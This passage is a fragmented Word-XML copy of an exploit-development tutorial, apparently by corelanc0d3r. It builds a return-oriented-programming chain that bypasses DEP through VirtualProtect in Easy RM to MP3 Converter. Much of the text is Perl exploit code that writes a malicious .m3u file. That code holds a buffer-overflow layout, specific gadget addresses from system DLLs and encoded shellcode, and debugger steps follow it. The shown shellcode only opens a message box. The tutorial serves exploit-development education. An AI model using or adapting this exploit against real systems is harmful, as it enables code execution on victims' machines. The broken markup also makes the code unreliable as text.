30\x4b\x4f\x51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\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50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\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c</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\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48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\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e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\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b</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\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50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\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e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\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51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\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50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\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43</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\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43</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\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50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\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48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\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46</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\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e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\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45</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\x5a\x41\x41</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$rest = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 300;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$payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($shellcode)."</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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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$FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Create the m3u file, attach Immunity to the application, set a breakpoint at 0x100102DC, open the file and wait until the breakpoint is hit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the breakpoint is hit, look at the stack. You should see your mini rop-chain, followed by the pointer to VirtualProtect and its parameters (placeholders), and then the location where we should end up after modifying ESP :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5514975" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Image29" descr="">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a:hlinkClick r:id="rId96"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5514975" cy="2733675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step through the instructions and watch EAX, EDI and ESP closely. You should see that ESP is pushed onto the stack, placed into EDI. Then EDI is pushed onto the stack and picked up in EAX. Finally 0x20 bytes are added to ESP and RET will put 4A4A4A4A in EIP (JJJJ = my $rop2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Got that ?  Let’s continue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Stage 2 : crafting the first parameter (return address)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We will now work on generating the first parameter and overwriting the placeholder for the first parameter on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The first parameter needs to point to the shellcode. This parameter will be used as return address for the VirtualProtect() function so, when the function has marked the page as executable, it would automatically jump to it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Where is our shellcode ?  Well, scroll down in the stack view. Right after the nops, you will see the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The plan is to use EAX or EDI (both contain a value on the stack), and increase that, leaving enough room for future rop gadgets, so it would point to the nops / shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(You can play with the size of the nops to make sure the altered value will always point at the nops/shellcode, so it should be pretty generic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Changing the value is as easy as adding bytes to the register. Suppose we want to use EAX, we can look for rop gadgets that would do ADD EAX,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A possible gadget would be :</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 xml:space="preserve">0x1002DC4C :  # ADD EAX,100 # POP EBP # RETN   [Module : MSRMfilter03.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This would increase EAX with 0x100.  One increase should be enough (0x100 = 256 bytes). And if it is not enough, we can insert another add later on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, we need to write this value onto the stack, overwriting the placeholder (which currently contains "WWWW" or 57575757).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>How can we do this ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The easiest way is to look for a pointer to MOV DWORD PTR DS:[register],EAX.  If we can make [register] point to the address where the placeholder is located, then we would end up overwriting that location with the contents of EAX ( = pointer to the shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A possible pointer would be this one :</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 xml:space="preserve">0x77E84115 :  # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN   [Module : RPCRT4.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to make this work, we have to put a pointer to the placeholder-0x10  into ESI. After the value was written, we’ll have the pointer to the placeholder in EAX (MOV EAX,ESI) which is good… we might be able to re-use it later on.  Next, we need to insert some padding to compensate for the POP ESI instruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Tip : get yourself a copy of </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>UnxUtils</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (port of the most important GNU utilities, for Win32). That way can use cat &amp; grep to look for good gadgets :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>cat rop.txt | grep "MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(don’t forget the backslash between :  and [ )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>But before we can use this instruction, we have to put the right value into ESI.  We have a pointer to the stack in EDI and EAX. EAX will already be used/changed (pointer to shellcode, remember), so we should try to put EDI into ESI and then alter it a bit so it points at parameter_1_placeholder – 0x10 :</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 xml:space="preserve">0x763C982F :  # XCHG ESI,EDI # DEC ECX # RETN 4   [Module : comdlg32.dll] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Putting these 3 things together, our first real rop chain will look like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Put EDI into ESI (and increase it, if necessary, so it would point at placeholder1), change the value in EAX so it would point at the shellcode, and then overwrite the placeholder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(Note : For the first overwrite operation, ESI will automatically point to the right location, so no need to increase or decrease the value. ESI+10 will point at the location of the first parameter placeholder)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In between the gadgets, we’ll need to compensate for additional POP’s and RETN4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After putting things together, this is what the sploit script looks like so far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 based exploit for Easy RM to MP3 Converter</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip=pack('V',0x100102DC); #return to stack</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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate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#------Put stack pointer in EDI &amp; EAX------------------------#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$rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI</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 = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate for POP EBP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#stack pointer is now in EAX &amp; EDI, now jump over parameters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$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20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#-------Parameters for VirtualProtect()----------------------#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my $params=pack('V',0x7C801AD4);          #VirtualProtect()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WWWW</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #return address (param1)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XXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #lpAddress      (param2)</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YYYY</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #Size           (param3)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ZZZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #flNewProtect   (param4)</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$params = $params.pack('V',0x10035005);  #writeable address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$params=$params.("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 8);  #padding</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ADD ESP,20 + RET will land here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change ESI so it points to correct location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to write first parameter (return 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my $rop2= pack('V',0x763C982F);  # XCHG ESI,EDI # DEC ECX # RETN 4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#-----Make eax point at shellcode--------------------------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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding - compensate for RETN4 before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#padding</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#return address is in EAX - write parameter 1</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$rop2=$rop2.pack('V',0x77E84115);</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xml:space="preserve">"; #padding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$nops = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\x90</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 240;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./msfpayload windows/messagebox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TITLE=CORELAN TEXT="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop test by corelanc0d3r</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" R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 ./msfencode -e x86/alpha_mixed -t perl</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my $shellcode =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\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a</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\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59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\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41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\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42</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\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51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\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49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\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46</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\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c</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\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45</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\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48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\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47</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\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48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\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47</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\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e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\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49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\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48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\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49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\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49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\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e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\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a</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\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42</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\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44</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\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e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\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b</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\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51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\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43</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\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50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\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51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\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50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\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c</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\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48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\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e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\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b</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\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50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\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e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\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51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\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50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\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43</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\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43</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\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50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\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48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\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46</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\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e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\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45</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\x5a\x41\x41</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$rest = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 300;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$payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($shellcode)."</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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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$FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Let’s step through in the debugger and see what happens after add esp,20 + ret is executed :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ret returns to 0x763C982F (which puts EDI into ESI).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>At this time, the registers look like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2219325" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Image30" descr="">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a:hlinkClick r:id="rId99"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2219325" cy="1000125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(EAX and ESI now point to the saved address on the stack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This gadget returns to 0x1002DC4C, which will add 0x100 bytes to EAX. This will increase the value in EAX to 0010F834, which points to the nops before the shellcode :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1781175" cy="2047875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Image31" descr="">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a:hlinkClick r:id="rId101"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1781175" cy="2047875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
